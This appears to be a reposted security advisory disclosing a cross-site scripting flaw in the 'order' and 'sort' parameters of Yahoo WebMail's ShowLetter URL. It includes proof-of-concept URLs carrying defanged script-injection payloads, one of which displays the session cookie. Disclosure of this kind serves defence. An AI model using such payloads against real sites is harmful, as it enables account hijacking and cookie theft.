‘Yahoo WebMail! Cross Site Scripting Vulnerability (order, sort)’
Summary
‘Yahoo is one of the world’s best and most common free web mail vendor. Yahoo mail is very reliable, safe and fast. It also allows secure connections (SSL) when checking mail. A cross-site scripting vulnerability allows a remote attacker to hijack existing accounts.’
Credit:
‘The information has been provided by Rafel Ivgi, The-Insider.’
Details
‘Vulnerable Systems:
* Yahoo WebMail!
Upon logging into Yahoo WebMail! and opening an email message, the URL looks something along the lines of:
http://us.f200.mail.yahoo.com/ym/ShowLetter?MsgId=3308_151647_1069_1720_553_0_917_-1_0 &YY=96862 &inc=25 &order=down &sort=date &pos=0 &view=a &head=b &box=Inbox
Testing all the variables seen in the URL yields the following results:
MsgId=3308_151647_1069_1720_553_0_917_-1_0 –> this field’s content doesn’t really matter, what is important is that it is numeric and with written with the correct syntax.
YY=96862 –> safe
inc=25 –> safe
order=down’><scr!pt>alert(‘xss’)</scr!pt> –> vulnerable
sort=date’><scr!pt>alert(‘xss’)</scr!pt> –> vulnerable
pos=0 –> safe
view=a –> safe
head=b –> safe
box=Inbox –> safe
Note: The script tag has been replaced with scr!pt so that an alert wouldn’t pop up in the viewer’s browser.
Pointing the browser to one of the following links while being logged on or while a cookie that contains authentication information has been saved on the local machine will allow script injection and thus stealing of the account.
The following examples illustrate the vulnerability:
http://us.f200.mail.yahoo.com/ym/ShowLetter?MsgId=3308_151647_1069_1720_553_0_917_-1_0 &YY=96862 &inc=25 &order=down’><scr!pt>alert(‘This can be your cookie’)</scr!pt> &sort=date &pos=0 &view=a &head=b &box=Inbox
http://us.f200.mail.yahoo.com/ym/ShowLetter?MsgId=3308_151647_1069_1720_553_0_917_-1_0 &YY=92552 &inc=25 &order=down &sort=date’><scr!pt>alert(document.cookie)</scr!pt> &pos=0 &view=a &head=b &box=Inbox‘